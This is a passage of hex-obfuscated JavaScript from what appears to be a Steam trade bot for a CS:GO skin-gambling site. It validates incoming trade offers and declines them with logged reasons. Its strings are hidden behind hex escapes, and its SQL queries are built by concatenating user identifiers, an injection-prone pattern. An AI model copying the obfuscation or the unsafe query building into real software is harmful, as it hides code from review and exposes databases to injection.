  259. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20" + m + "\x20\x73\x6b\x69\x6e\x73"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b)), f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20\x75\x70\x20\x74\x6f\x20" + m + "\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  260. });
  261. var p = a.itemsToReceive,
  262. q = 0,
  263. s = [],
  264. t = 0;
  265. p.forEach(function(d, e, h) {
  266. if (730 != d.appid) return b = !1, a.decline(function(b) {
  267. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x61\x20\x4e\x6f\x6e\x2d\x43\x53\x47\x4f\x20\x73\x6b\x69\x6e"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  268. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20\x43\x53\x47\x4f\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {});
  269. s[e] = [], s[e].name = d.market_name, s[e].color = d.name_color, s[e].url = d.icon_url, s[e].value = 0;
  270. var j = d.market_name,
  271. k = "\x68\x74\x74\x70\x3a\x2f\x2f" + sitepath + "\x2f\x63\x6f\x73\x74\x2e\x70\x68\x70\x3f\x69\x74\x65\x6d\x3d" + encodeURIComponent(j);
  272. ! function(d) {
  273. request(k, function(d, h, j) {
  274. return d || 200 !== h.statusCode ? (b = !1, a.decline(function(b) {
  275. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  276. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : "\x6e\x6f\x74\x66\x6f\x75\x6e\x64" == j ? (b = !1, a.decline(function(b) {
  277. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  278. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : (s[e].value = parseFloat(j), void(q += s[e].value))
  279. })
  280. }(e), t++
  281. }), f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x69\x6e\x66\x6f\x60", function(d, e) {
  282. var u = e[0].value;
  283. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x69\x64\x60\x3d\x27" + u + "\x27", function(d, e, u) {
  284. if (starttime = e[0].starttime, 2147483647 != starttime) {
  285. var v = Math.round((new Date).getTime() / 1e3);
  286. if (tl = starttime + GameTime - v, tl <= snipetimer) return b = !1, a.decline(function(b) {
  287. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x54\x68\x65\x20\x42\x6f\x74\x20\x77\x6f\x6e\x74\x20\x61\x63\x63\x65\x70\x74\x20\x6c\x61\x73\x74\x20\x73\x65\x63\x6f\x6e\x64\x20\x62\x65\x74\x73"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  288. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x6e\x6f\x74\x20\x62\x65\x74\x20\x69\x6e\x20\x74\x68\x65\x20\x6c\x61\x73\x74\x20\x66\x65\x77\x20\x73\x65\x63\x6f\x6e\x64\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  289. }
  290. setTimeout(function() {
  291. return 0 != b ? q > l ? (b = !1, a.decline(function(b) {
  292. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x75\x63\x68\x20\x69\x6e\x20\x73\x6b\x69\x6e\x20\x76\x61\x6c\x75\x65"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  293. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20\x24" + l + "\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : h > q ? (b = !1, a.decline(function(b) {
  294. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x62\x65\x6c\x6f\x77\x20\x74\x68\x65\x20\x6d\x69\x6e\x69\x6d\x61\x6c\x20\x62\x65\x74\x20\x61\x6d\x6f\x75\x6e\x74\x20\x28\x24" + h + "\x29"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  295. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x76\x61\x6c\x75\x65\x3a\x20\x24" + h + "\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : t > m ? (b = !1, a.decline(function(b) {
  296. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x61\x6e\x79\x20\x73\x6b\x69\x6e\x73"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  297. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x57\x65\x20\x6f\x6e\x6c\x79\x20\x61\x63\x63\x65\x70\x74\x20\x75\x70\x20\x74\x6f\x20" + m + "\x20\x73\x6b\x69\x6e\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : (b = !0) ? void f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x69\x6e\x66\x6f\x60", function(d, e) {
  298. var h = e[0].value;
  299. f.query("\x53\x45\x4c\x45\x43\x54\x20\x43\x4f\x55\x4e\x54\x28\x76\x61\x6c\x75\x65\x29\x20\x61\x73\x20\x73\x6b\x69\x6e\x73\x69\x6e\x2c\x53\x55\x4d\x28\x76\x61\x6c\x75\x65\x29\x20\x61\x73\x20\x6d\x6f\x6e\x65\x79\x69\x6e\x20\x46\x52\x4f\x4d\x20\x60" + k + "\x67\x61\x6d\x65" + h + "\x60\x20\x57\x48\x45\x52\x45\x20\x60\x75\x73\x65\x72\x69\x64\x60\x3d\x27" + c + "\x27", function(d, e, u) {
  300. if (skinsin = e[0].skinsin, skinsin += t, moneyin = e[0].moneyin, moneyin += q, skinsin > m) return a.decline(function(b) {
  301. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x61\x6e\x79\x20\x73\x6b\x69\x6e\x73"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  302. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x6e\x6f\x74\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20" + m + "\x20\x73\x6b\x69\x6e\x73\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {});
  303. if (moneyin > l) return a.decline(function(b) {
  304. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x74\x6f\x6f\x20\x6d\x75\x63\x68\x20\x69\x6e\x20\x73\x6b\x69\x6e\x20\x76\x61\x6c\x75\x65"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  305. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x64\x65\x70\x6f\x73\x69\x74\x20\x6d\x6f\x72\x65\x20\x74\x68\x61\x6e\x20\x24" + l + "\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {});
  306. for (var v = 0; t > v; v++) {
  307. if (0 == s[v].value || !s[v].value) return b = !1, a.decline(function(b) {
  308. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  309. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {});
  310. if (!o(s[v].value)) return a.decline(function(b) {
  311. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x52\x45\x43\x48\x45\x43\x4b\x20\x2d\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x49\x73\x73\x75\x65\x73\x20\x28\x43\x61\x6e\x27\x74\x20\x67\x65\x74\x20\x74\x68\x65\x20\x73\x6b\x69\x6e\x27\x73\x20\x76\x61\x6c\x75\x65\x29\x20"),
  312. b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  313. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x53\x74\x65\x61\x6d\x20\x4d\x61\x72\x6b\x65\x74\x20\x69\x73\x73\x75\x65\x73\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {});
  314. if (-1 != s[v].name.indexOf("\x53\x6f\x75\x76\x65\x6e\x69\x72")) return b = !1, a.decline(function(b) {
  315. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x55\x73\x65\x72\x20\x73\x65\x6e\x74\x20\x61\x20\x53\x6f\x75\x76\x65\x6e\x69\x72\x20\x53\x6b\x69\x6e"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  316. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4e\x6f\x20\x73\x6f\x75\x76\x65\x6e\x69\x72\x20\x73\x6b\x69\x6e\x73\x20\x61\x6c\x6c\x6f\x77\x65\x64\x21\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})
  317. }
  318. f.query("\x53\x45\x4c\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\x20\x60\x75\x73\x65\x72\x73\x60\x20\x57\x48\x45\x52\x45\x20\x60\x73\x74\x65\x61\x6d\x69\x64\x60\x3d\x27" + c + "\x27", function(d, e, l) {
  319. return d ? (console.log("\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x3a\x20" + d), a.decline(function(b) {
  320. console.log("\x5b\x44\x45\x42\x55\x47\x5d\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x20\x6f\x66\x66\x65\x72\x20\x23" + a.id + "\x20\x66\x72\x6f\x6d\x20" + i + "\x20\x28\x49\x44\x3a" + c + "\x29\x2e\x20\x7c\x20\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x20\x28\x61\x73\x20\x73\x65\x65\x6e\x20\x61\x62\x6f\x76\x65\x29\x20"), b && (g.webLogOn(), console.log("\x44\x65\x63\x6c\x69\x6e\x65\x20\x65\x72\x72\x6f\x72\x3a\x20" + b))
  321. }), void f.query("\x49\x4e\x53\x45\x52\x54\x20\x49\x4e\x54\x4f\x20\x60\x6d\x65\x73\x73\x61\x67\x65\x73\x60\x20\x28\x60\x74\x79\x70\x65\x60\x2c\x60\x61\x70\x70\x60\x2c\x60\x75\x73\x65\x72\x69\x64\x60\x2c\x60\x74\x69\x74\x6c\x65\x60\x2c\x60\x6d\x73\x67\x60\x2c\x60\x74\x69\x6d\x65\x60\x2c\x60\x61\x63\x74\x69\x76\x65\x60\x29\x20\x56\x41\x4c\x55\x45\x53\x20\x28\x27\x65\x72\x72\x6f\x72\x27\x2c\x27\x31\x27\x2c\x27" + c + "\x27\x2c\x27\x54\x72\x61\x64\x65\x20\x4f\x66\x66\x65\x72\x20\x44\x65\x63\x6c\x69\x6e\x65\x64\x21\x27\x2c\x27\x52\x65\x61\x73\x6f\x6e\x3a\x20\x4d\x59\x53\x51\x4c\x20\x45\x72\x72\x6f\x72\x27\x2c\x27\x32\x35\x27\x2c\x27\x31\x27\x29", function(a, b, c) {})) : 0 == e.length ? void a.decline(function(b) {
